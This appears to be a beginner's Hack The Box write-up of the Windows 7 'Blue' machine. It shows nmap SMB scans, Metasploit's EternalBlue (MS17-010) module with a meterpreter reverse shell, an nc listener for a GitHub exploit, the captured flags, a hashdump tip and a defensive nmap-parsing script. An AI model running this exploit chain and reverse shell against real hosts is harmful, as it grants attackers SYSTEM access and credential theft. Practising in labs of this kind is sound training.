
Blue Writeup

Disclaimer
I'm just a beginner. Please correct me if I'm wrong.

The 51st HTB machine, and just as Lame as the first one.

Blue Badge

Machine Information

Machine Description
Name        Blue
OS          Windows
Difficulty  Easy
Author      ch4p

Reconnaissance

Service Scan

PORT      STATE  SERVICE      VERSION
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49151/tcp closed unknown
49152/tcp open   msrpc        Microsoft Windows RPC
49153/tcp open   msrpc        Microsoft Windows RPC
49154/tcp open   msrpc        Microsoft Windows RPC
49155/tcp open   msrpc        Microsoft Windows RPC
49156/tcp open   msrpc        Microsoft Windows RPC
49157/tcp open   msrpc        Microsoft Windows RPC
49158/tcp closed unknown
49159/tcp closed unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-14T03:00:03+00:00
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_clock-skew: mean: -25s, deviation: 2s, median: -26s
| smb2-time:
|   date: 2024-03-14T03:00:01
|_  start_date: 2024-03-14T02:55:08
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

SMB Vulnerability Scan - Ports 135, 139, 445

Bash
┌──(xavierkali)-[~//htb/blue/recons/nmap]
└─$ sudo nmap -p 135,139,445 --script smb-vul* 10.129.214.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 02:03 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.129.214.101
Host is up (0.33s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds
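As an added example (not part of the original writeup), a small Python triage script that parses the "|"-prefixed host-script blocks Nmap prints, as in the two scans above, and turns the smb-vuln-ms17-010 and SMB-signing results into remediation items. The sample input is a constructed, abbreviated copy of that output.

```python
import re

# Constructed sample: an abbreviated copy of the host-script blocks from the scans above.
SAMPLE = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
"""

def parse_host_scripts(text: str) -> dict[str, list[str]]:
    """Map each NSE script name to its output lines, with the '|' gutter removed."""
    scripts: dict[str, list[str]] = {}
    current = None
    for line in text.splitlines():
        m = re.match(r"^\|_?(.*)$", line)
        if not m or not m.group(1).strip():
            continue  # title line, or an empty "|" spacer inside a block
        body = m.group(1)
        # Nmap prints a script header with 0-1 spaces of indent ("|_" marks a
        # block's last line); the block's own output lines are indented 2+ spaces.
        indent = len(body) - len(body.lstrip(" "))
        if indent <= 1:
            name, _, inline = body.strip().partition(":")
            current = name
            scripts[current] = [inline.strip()] if inline.strip() else []
        elif current is not None:
            scripts[current].append(body.strip())
    return scripts

def smb_findings(scripts: dict[str, list[str]]) -> list[str]:
    """Turn parsed blocks into remediation items for the SMB exposures seen on Blue."""
    findings = []
    if any(l.startswith("State: VULNERABLE") for l in scripts.get("smb-vuln-ms17-010", [])):
        findings.append("MS17-010: host is unpatched; install the MS17-010 update and disable SMBv1")
    if any(l.startswith("message_signing: disabled") for l in scripts.get("smb-security-mode", [])):
        findings.append("SMBv1 signing disabled: require signing via Group Policy")
    if any("not required" in l for l in scripts.get("smb2-security-mode", [])):
        findings.append("SMB2 signing not required: set 'Digitally sign communications (always)'")
    return findings

if __name__ == "__main__":
    for item in smb_findings(parse_host_scripts(SAMPLE)):
        print("-", item)
```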

MS17-010 - EternalBlue

Yet another hole that has been beaten to death.
In case you don't know, this vulnerability only came to light after the hacker group The Shadow Brokers released the NSA's hacking tools in 2017, and a few months later WannaCry arrived. Remember: government agencies are never righteous; they go to any lengths to obtain intelligence, even at the cost of everyone's network security.
Now you know why Blue's avatar is a man in a suit.

Metasploit

Bash
┌──(xavierkali)-[~//htb/blue/recons/nmap]
└─$ msfconsole

msf6 > search eternal

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 8787
LPORT => 8787
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.214.101
RHOSTS => 10.129.214.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2404 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    haris
The command completed with one or more errors.


C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
type C:\Users\haris\Desktop\user.txt
9ed6837923bd49294822bc3ca357bc05

C:\Windows\system32>type C:\users\Administrator\Desktop\root.txt
type C:\users\Administrator\Desktop\root.txt
fa9332445be6cf80c9b70733de26b9a1

Without Metasploit

Since the OSCP does not allow Metasploit, let's also try one of the scripts on GitHub, for example d4t4s3c/Win7Blue.

Bash
┌──(xavierkali)-[~/Documents/CTF/htb/legacy]
└─$ nc -lvnp 8787
listening on [any] 8787 ...
connect to [10.10.14.9] from (UNKNOWN) [10.129.214.101] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>echo %USERDOMAIN%\%USERNAME%
echo %USERDOMAIN%\%USERNAME%
%USERDOMAIN%\SYSTEM

Postscript

If you want to play around a bit more, you can run hashdump from meterpreter and then use PsExec.


Last update: 2024-12-23 Created: 2024-03-13